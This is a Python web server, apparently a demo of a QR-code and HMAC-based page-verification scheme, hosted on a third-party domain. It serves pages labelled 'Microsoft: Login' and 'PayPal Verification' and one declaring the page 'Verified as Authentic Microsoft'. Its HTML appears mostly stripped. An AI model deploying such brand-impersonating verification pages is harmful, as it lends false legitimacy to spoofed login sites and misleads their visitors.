from http.server import HTTPServer, BaseHTTPRequestHandler import json import uuid import time import hmac import hashlib import qrcode import io import base64 import socket from urllib.parse import parse_qs, urlparse from datetime import datetime from qrcode import QRCode import ssl def get_ip(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: s.connect(('10.255.255.255', 1)) IP = s.getsockname()[0] except Exception: IP = '127.0.0.1' finally: s.close() return IP SERVER_IP = 'sub1.kalkikrivadna.com' PORT = 8080 # In production, this would be a secure key stored in web infrastructure SERVER_SECRET_KEY = b"demo_secret_key_would_be_secure_in_production" # Store verifications with additional security data page_verifications = {} class PayPalVerificationServer(BaseHTTPRequestHandler): def generate_security_code(self, token): """Generate a time-based security code using HMAC""" timestamp = str(int(time.time()) // 30) # Changes every 30 seconds message = f"{token}:{timestamp}".encode() hmac_obj = hmac.new(SERVER_SECRET_KEY, message, hashlib.sha256) return hmac_obj.hexdigest()[:8] # Use first 8 chars as security code def do_GET(self): parsed_path = urlparse(self.path) if parsed_path.path == '/': self.send_response(200) self.send_header('Content-Type', 'text/html') self.send_header('Cache-Control', 'no-store, must-revalidate') self.end_headers() self.wfile.write(self.get_paypal_demo_page().encode()) elif parsed_path.path == '/verify-page': try: verification_token = str(uuid.uuid4()) verification_url = f"http://{SERVER_IP}:{PORT}/validate-page?token={verification_token}" security_code = self.generate_security_code(verification_token) page_verifications[verification_token] = { 'timestamp': time.time(), 'verified': False, 'security_code': security_code } qr = qrcode.QRCode(version=1, box_size=10, border=5) qr.add_data(verification_url) qr.make(fit=True) img_buffer = io.BytesIO() img = qr.make_image(fill_color="black", back_color="white") img.save(img_buffer, format='PNG') qr_base64 = base64.b64encode(img_buffer.getvalue()).decode() self.send_response(200) self.send_header('Content-Type', 'application/json') self.send_header('Cache-Control', 'no-store') self.end_headers() response = { 'qr_code': qr_base64, 'token': verification_token, 'security_code': security_code } self.wfile.write(json.dumps(response).encode()) except Exception as e: print(f"Error: {str(e)}") self.send_error(500) elif parsed_path.path == '/validate-page': query = parse_qs(parsed_path.query) token = query.get('token', [None])[0] if token and token in page_verifications: page_verifications[token]['verified'] = True security_code = self.generate_security_code(token) self.send_response(200) self.send_header('Content-Type', 'text/html') self.end_headers() validation_page = f''' Microsoft Anti-Phishing Security Verification Microsoft Logo

✓ Page Verified as Authentic Microsoft

Security Code (changes every 30 seconds):

{security_code}

Verified at: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}

You can close this window.

''' self.wfile.write(validation_page.encode()) else: self.send_error(400, "Invalid verification token") elif parsed_path.path == '/check-verification': query = parse_qs(parsed_path.query) token = query.get('token', [None])[0] if token and token in page_verifications: security_code = self.generate_security_code(token) self.send_response(200) self.send_header('Content-Type', 'application/json') self.end_headers() response = { 'verified': page_verifications[token]['verified'], 'security_code': security_code } self.wfile.write(json.dumps(response).encode()) else: self.send_error(400, "Invalid verification token") def get_paypal_demo_page(self): return ''' Microsoft: Login
PayPal Verification

Microsoft Security Verification

Scan QR code to verify this page

Verification QR Code
Verification Status: Checking...
''' def run_https_server(certfile, keyfile, domain='sub1.kalkikrivadna.com', port=8080): server_address = (domain, port) # Use the domain instead of 0.0.0.0 httpd = HTTPServer(server_address, PayPalVerificationServer) # Create an SSL context and wrap the socket with SSL context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH) context.load_cert_chain(certfile=certfile, keyfile=keyfile) # Wrap the server socket with SSL httpd.socket = context.wrap_socket(httpd.socket, server_side=True) print(f"HTTPS server running at https://{domain}:{port}") httpd.serve_forever() if __name__ == '__main__': CERTFILE = '/etc/letsencrypt/live/sub1.kalkikrivadna.com/fullchain.pem' KEYFILE = '/etc/letsencrypt/live/sub1.kalkikrivadna.com/privkey.pem' try: run_https_server(certfile=CERTFILE, keyfile=KEYFILE, domain='sub1.kalkikrivadna.com', port=8080) except Exception as e: print(f"Failed to start HTTPS server: {e}")